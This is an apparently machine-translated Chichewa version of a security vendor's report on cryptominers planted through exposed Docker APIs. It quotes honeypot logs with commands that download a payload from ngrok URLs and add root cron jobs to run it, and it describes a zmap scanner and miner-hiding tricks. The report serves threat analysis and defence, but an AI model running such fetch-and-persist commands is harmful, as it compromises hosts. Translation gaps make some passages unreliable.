Tidasanthula zomwe zidasonkhanitsidwa pogwiritsa ntchito miphika ya uchi, yomwe tidapanga kuti tizitsatira zomwe zawopseza. Ndipo tidazindikira zochitika zazikulu kuchokera kwa ochita migodi osafunidwa kapena osaloleka a cryptocurrency omwe adayikidwa ngati zotengera zachinyengo pogwiritsa ntchito chithunzi chosindikizidwa ndi anthu pa Docker Hub. Chithunzicho chimagwiritsidwa ntchito ngati gawo la ntchito zomwe zimapereka anthu ochita migodi oyipa cryptocurrency.
Kuphatikiza apo, mapulogalamu ogwirira ntchito ndi ma netiweki amayikidwa kuti alowe m'matumba otseguka oyandikana nawo ndi mapulogalamu.
Timasiya miphika yathu ya uchi monga momwe zilili, ndiye kuti, ndi zoikika zosasinthika, popanda njira zachitetezo kapena kukhazikitsa mapulogalamu owonjezera. Chonde dziwani kuti Docker ali ndi malingaliro okhazikitsa koyambirira kuti apewe zolakwika ndi zovuta zosavuta. Koma miphika ya uchi yomwe imagwiritsidwa ntchito ndi mbiya, yopangidwa kuti iwonetsere zomwe zimayang'ana papulatifomu, osati zomwe zili mkati mwazotengerazo.
Zoyipa zomwe zapezeka ndizodziwikiratu chifukwa sizifuna chiwopsezo komanso sizidalira mtundu wa Docker. Kupeza chithunzi chomwe sichinasinthidwe molakwika, motero chotseguka, chidebe ndizomwe owukira amafunikira kuti awononge ma seva ambiri otseguka.
Docker API yosatsekedwa imalola wogwiritsa ntchito kuchita zambiri , kuphatikizapo kupeza mndandanda wa zotengera zomwe zikuyenda, kupeza zipika kuchokera ku chidebe china, kuyambira, kuyimitsa (kuphatikizapo kukakamizidwa) komanso kupanga chidebe chatsopano kuchokera pa chithunzi china chokhala ndi zoikamo zotchulidwa.
Kumanzere kuli njira yobweretsera pulogalamu yaumbanda. Kumanja kuli malo owukira, omwe amalola kutulutsa kwakutali kwa zithunzi.
Kugawidwa ndi dziko la 3762 lotseguka Docker API. Kutengera kusaka kwa Shodan pa 12.02.2019/XNUMX/XNUMX
Kuwukira unyolo ndi payload options
Ntchito yoyipa idapezeka osati mothandizidwa ndi miphika ya uchi. Deta yochokera ku Shodan ikuwonetsa kuti kuchuluka kwa ma Docker API owonekera (onani chithunzi chachiwiri) chawonjezeka kuyambira pomwe tidafufuza chidebe chosasinthika chomwe chimagwiritsidwa ntchito ngati mlatho wotumizira pulogalamu yamigodi ya Monero cryptocurrency. Mu October chaka chatha (2018, deta yamakono pafupifupi. womasulira) panali ma API 856 okha otseguka.
Kuwunika kwa zipika za mphika wa uchi kunawonetsa kuti kugwiritsa ntchito zithunzi za chidebe kumalumikizidwanso ndi kugwiritsa ntchito , chida chokhazikitsira maulumikizidwe otetezeka kapena kutumiza magalimoto kuchokera kumalo ofikira anthu kupita ku ma adilesi kapena zinthu zina (mwachitsanzo localhost). Izi zimalola oukirawo kuti azitha kupanga ma URL mwachangu popereka zolipira ku seva yotseguka. M'munsimu muli zitsanzo za ma code kuchokera ku zipika zosonyeza nkhanza za ngrok service:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Monga mukuwonera, mafayilo omwe adakwezedwa amatsitsidwa kuchokera ku ma URL omwe amasintha nthawi zonse. Ma URLwa ali ndi tsiku lalifupi lotha ntchito, kotero kuti zolipira sizingatsitsidwe tsiku lotha ntchito litatha.
Pali njira ziwiri zolembetsera. Yoyamba ndi yopangidwa ndi ELF miner ya Linux (yotchedwa Coinminer.SH.MALXMR.ATNO) yomwe imagwirizanitsa ndi dziwe la migodi. Yachiwiri ndi script (TrojanSpy.SH.ZNETMAP.A) yopangidwa kuti ipeze zida zina za netiweki zomwe zimagwiritsidwa ntchito kusanthula ma netiweki ndikufufuza zatsopano.
Zolemba za dropper zimayika mitundu iwiri, yomwe imagwiritsidwa ntchito kuyika cryptocurrency miner. Kusintha kwa HOST kuli ndi ulalo komwe mafayilo oyipa ali, ndipo RIP yosinthika ndi dzina la fayilo (kwenikweni, hashi) ya mgodi kuti atumizidwe. Kusintha kwa HOST kumasintha nthawi iliyonse kusintha kwa hashi kumasintha. Zolembazo zimayesanso kuonetsetsa kuti palibe ena ogwira ntchito m'migodi ya cryptocurrency omwe akuyendetsa pa seva yowukiridwa.
Zitsanzo zamitundu yosiyanasiyana ya HOST ndi RIP, komanso kachidutswa kakang'ono komwe kamagwiritsidwa ntchito kuti muwone ngati palibe ochita migodi ena omwe akuyenda.
Asanayambe mgodi, amasinthidwa kukhala nginx. Matembenuzidwe ena a script iyi amatcha dzina la mgodi ku mautumiki ena ovomerezeka omwe angakhalepo m'madera a Linux. Izi nthawi zambiri zimakhala zokwanira kuti mulambalale macheke motsutsana ndi mndandanda wazomwe zikuyenda.
Zolemba zofufuzira zilinso ndi mawonekedwe. Zimagwira ntchito ndi utumiki wa URL womwewo kuti ugwiritse ntchito zida zofunika. Zina mwa izo ndi zmap binary, yomwe imagwiritsidwa ntchito kusanthula maukonde ndikupeza mndandanda wamadoko otseguka. Zolembazo zimanyamulanso binary ina yomwe imagwiritsidwa ntchito polumikizana ndi mautumiki opezeka ndi kulandira zikwangwani kuchokera kwa iwo kuti adziwe zambiri za ntchito yomwe yapezeka (mwachitsanzo, mtundu wake).
Zolembazo zimadziwiratu zamitundu ina ya netiweki kuti ijambule, koma izi zimatengera mtundu wa script. Imayikanso madoko omwe akutsata kuchokera kuzinthuzi, pakadali pano, Docker - isanayambe sikani.
Zolinga zikangopezeka, zikwangwani zimachotsedwa mwa iwo okha. Zolembazo zimasefanso mipherezero kutengera ntchito, mapulogalamu, zigawo kapena nsanja zomwe zimakonda: Redis, Jenkins, Drupal, MODX, , kasitomala wa Docker 1.16 ndi Apache CouchDB. Ngati seva yojambulidwa ikufanana ndi iliyonse yaiwo, imasungidwa mufayilo, yomwe owukira atha kugwiritsa ntchito pambuyo pake kuwunika ndikubera. Mafayilo awa amalowetsedwa kumaseva a owukira kudzera pamaulalo amphamvu. Ndiko kuti, ulalo wosiyana umagwiritsidwa ntchito pa fayilo iliyonse, zomwe zikutanthauza kuti kupezako kumavuta.
Vector yowukira ndi chithunzi cha Docker, monga tikuwonera m'magawo awiri otsatirawa.
Pamwamba ndikusinthidwa kukhala ntchito yovomerezeka, ndipo pansi ndi momwe zmap imagwiritsidwira ntchito kusanthula maukonde.
Pamwambapa pali ma network omwe adafotokozedweratu, pansi pali madoko enieni osaka ntchito, kuphatikiza Docker
Chithunzicho chikuwonetsa kuti chithunzi cha alpine-curl chidatsitsidwa nthawi zopitilira 10 miliyoni
Kutengera Alpine Linux ndi curl, chida chothandizira CLI chosinthira mafayilo pama protocol osiyanasiyana, mutha kupanga . Monga mukuonera pachithunzi chapitachi, chithunzichi chatsitsidwa kale maulendo oposa 10 miliyoni. Kutsitsa kochulukirapo kungatanthauze kugwiritsa ntchito chithunzichi ngati polowera; chithunzichi chidasinthidwa kuposa miyezi isanu ndi umodzi yapitayo; ogwiritsa ntchito sanatsitse zithunzi zina kuchokera m'nkhokweyi nthawi zambiri. Ku Docker - malangizo omwe amagwiritsidwa ntchito pokonza chidebe kuti chiziyendetsa. Ngati zokonda zolowera sizolondola (mwachitsanzo, chidebecho chimasiyidwa chotseguka kuchokera pa intaneti), chithunzicho chingagwiritsidwe ntchito ngati chowombera. Zigawenga zitha kuzigwiritsa ntchito popereka ndalama zolipirira ngati apeza chidebe chosasinthika kapena chotseguka chomwe sichinathandizidwe.
Ndikofunika kuzindikira kuti chithunzichi (alpine-curl) sichili choipa, koma monga momwe mukuonera pamwambapa, chingagwiritsidwe ntchito pochita ntchito zoipa. Zithunzi zofananira za Docker zitha kugwiritsidwanso ntchito kuchita zoyipa. Tidalumikizana ndi a Docker ndikugwira nawo ntchito pankhaniyi.
ayamikira
zotsalira kwa makampani ambiri, makamaka omwe akukwaniritsa , yoyang'ana pa chitukuko chofulumira ndi kutumiza. Chilichonse chikukulitsidwa chifukwa chotsatira malamulo owerengera ndi kuyang'anira, kufunikira koyang'anira chinsinsi cha deta, komanso kuwonongeka kwakukulu kwa kusamvera kwawo. Kuphatikizira zodzitetezera muzochita zachitukuko sikumangokuthandizani kuti mupeze mabowo otetezedwa omwe mwina sangawonekere, komanso kukuthandizani kuchepetsa ntchito zosafunikira, monga kuyendetsa mapulogalamu owonjezera omwe amapangidwira pachiwopsezo chilichonse chomwe chapezeka kapena kusasinthika pulogalamu ikatumizidwa.
Zomwe takambirana m'nkhaniyi zikusonyeza kufunika koganizira za chitetezo kuyambira pachiyambi, kuphatikizapo zotsatirazi:
- Kwa oyang'anira makina ndi opanga mapulogalamu: Nthawi zonse fufuzani zokonda zanu za API kuti muwonetsetse kuti zonse zakonzedwa kuti zingovomereza zopempha kuchokera ku seva inayake kapena netiweki yamkati.
- Tsatirani mfundo yaufulu wocheperako: onetsetsani kuti zithunzi za chidebe zasaina ndikutsimikiziridwa, chepetsani mwayi wopezeka pazinthu zofunika kwambiri (ntchito yoyambitsa nkhonya) ndikuwonjezera kubisa pamalumikizidwe a netiweki.
- Tsatirani ndikuthandizira njira zotetezera, mwachitsanzo. ndi zomangidwa .
- Gwiritsani ntchito sikani pakompyuta nthawi yothamangitsira ndi zithunzi kuti mudziwe zambiri za njira zomwe zikuyenda mu chidebecho (mwachitsanzo, kuti muwone ngati zachitika kapena kusaka zovuta). Kuwongolera kugwiritsa ntchito ndi kuyang'anira kukhulupirika kumathandizira kutsata zosintha zachilendo kwa ma seva, mafayilo, ndi madera adongosolo.
Trendmicro imathandizira magulu a DevOps kumanga motetezeka, kutulutsa mwachangu, ndikuyambitsa kulikonse. Trend Micro Amapereka chitetezo champhamvu, chowongoleredwa, komanso chodziwikiratu pamapaipi agulu a DevOps ndipo amapereka chitetezo chowopsa zingapo. kuteteza zochulukira zakuthupi, zenizeni komanso zamtambo panthawi yothamanga. Komanso amawonjezera chidebe chitetezo ndi и , yomwe imayang'ana zithunzi za chidebe cha Docker za pulogalamu yaumbanda ndi zowopsa nthawi iliyonse yapaipi yachitukuko kuti ziteteze ziwopsezo zisanatumizidwe.
Zizindikiro za kusagwirizana
Ma heshi ogwirizana:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
pa Okamba oyeserera amawonetsa makonda omwe akuyenera kupangidwa poyamba kuti achepetse mwayi kapena kupeweratu zochitika zomwe tafotokozazi. Ndipo pa Ogasiti 19-21 pa intaneti kwambiri Mutha kukambirana izi ndi zovuta zofananira zachitetezo ndi anzanu ndikuchita nawo aphunzitsi patebulo lozungulira, pomwe aliyense amatha kuyankhula ndikumvetsera zowawa ndi kupambana kwa anzawo odziwa zambiri.
Source: www.habr.com